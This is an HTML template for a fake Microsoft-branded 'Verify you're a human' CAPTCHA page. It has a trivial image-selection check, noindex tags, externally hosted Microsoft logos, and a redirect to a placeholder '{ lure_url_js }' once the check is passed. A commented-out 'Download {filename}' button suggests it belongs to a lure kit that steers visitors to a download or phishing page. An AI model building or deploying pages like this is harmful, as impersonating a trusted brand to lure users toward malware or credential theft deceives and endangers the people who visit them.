<!doctype html>
<html lang="en">

<head>
    <title>Verification</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="icon" href="https://i.ibb.co/5r5mkr6/Whats-App-Image-2024-09-13-at-23-15-31-58edaa67.jpg"
        type="image/x-icon">
    <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noimageindex">
    <!-- <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
        integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous"> -->
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-image: url('https://i.ibb.co/Fw6pkb9/microsoftbg.png');
            background-repeat: no-repeat;
            background-size: cover;
            margin: 0;
        }

        .captcha-container {
            text-align: center;
            padding: 20px;
            border: 1px solid #ddd;
            background-color: white;
            box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
        }

        .captcha-grid {
            display: grid;
            grid-template-columns: repeat(3, 100px);
            grid-gap: 10px;
            margin-bottom: 15px;
        }

        .captcha-grid img {
            width: 100px;
            height: 100px;
            cursor: pointer;
            border: 2px solid transparent;
        }

        .captcha-grid img.selected {
            border-color: #4CAF50;
        }

        button {
            padding: 10px 20px;
            background-color: #00A4EF;
            color: white;
            border: none;
            cursor: pointer;
        }

        button:hover {
            background-color: #00A4EF;
        }

        #captchaResult {
            margin-top: 15px;
            color: #d9534f;
        }
    </style>
</head>

<body>
    <div class="captcha-container">
        <img width="110px" style="display: flex;justify-content: flex-start;"
            src="https://i.ibb.co/wyBH88T/microsoftlogo.png">
        <h2>Verify you're a human</h2>
        <p>Select all the squares below:</p>
        <div class="captcha-grid" id="captchaGrid">
            <!-- Grid images will be dynamically inserted here -->
        </div>
        <button onclick="clickedDownload()">Verify</button>
        <p id="captchaResult"></p>
    </div>




    <!-- <div class="download">
        <button type="button" class="btn btn-primary btn-lg" onclick="clickedDownload()">Download
            <strong>{filename}</strong></button>
    </div> -->
    <script>
        const gridImages = [
            { src: 'https://i.ibb.co/YtWb4tM/IMG-0168.jpg', isSquare: true },
            { src: 'https://i.ibb.co/VvCbgVL/world.jpg', isSquare: false },
            { src: 'https://i.ibb.co/N943x2z/IMG-0166.jpg', isSquare: true },
            { src: 'https://i.ibb.co/6RWnLZk/IMG-0171.jpg', isSquare: false },
            { src: 'https://i.ibb.co/7G8fDng/IMG-0167.jpg', isSquare: true },
            { src: 'https://i.ibb.co/bdMGTYx/IMG-0170.jpg', isSquare: false }
        ];

        let selectedSquares = [];

        window.onload = function () {
            const grid = document.getElementById('captchaGrid');
            gridImages.forEach((image, index) => {
                const imgElement = document.createElement('img');
                imgElement.src = image.src;
                imgElement.addEventListener('click', () => selectImage(imgElement, image.isSquare));
                grid.appendChild(imgElement);
            });
        };

        function selectImage(imgElement, isSquare) {
            imgElement.classList.toggle('selected');

            if (isSquare) {
                if (selectedSquares.includes(imgElement)) {
                    selectedSquares = selectedSquares.filter(item => item !== imgElement);
                } else {
                    selectedSquares.push(imgElement);
                }
            }
        };
        function clickedDownload() {
            const resultText = document.getElementById('captchaResult');
            const correctSelections = selectedSquares.length === gridImages.filter(img => img.isSquare).length;

            if (correctSelections) {
                resultText.style.color = '#4CAF50';
                resultText.textContent = 'CAPTCHA passed!';
                setTimeout(() => {
                    window.location.assign({ lure_url_js });
                }, 1000); // Adjust the delay as needed (1000 ms = 1 second)
            } else {
                resultText.textContent = 'Try again.';
            }
        };

    </script>

    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"
        integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj"
        crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"
        integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN"
        crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"
        integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV"
        crossorigin="anonymous"></script>
</body>

</html>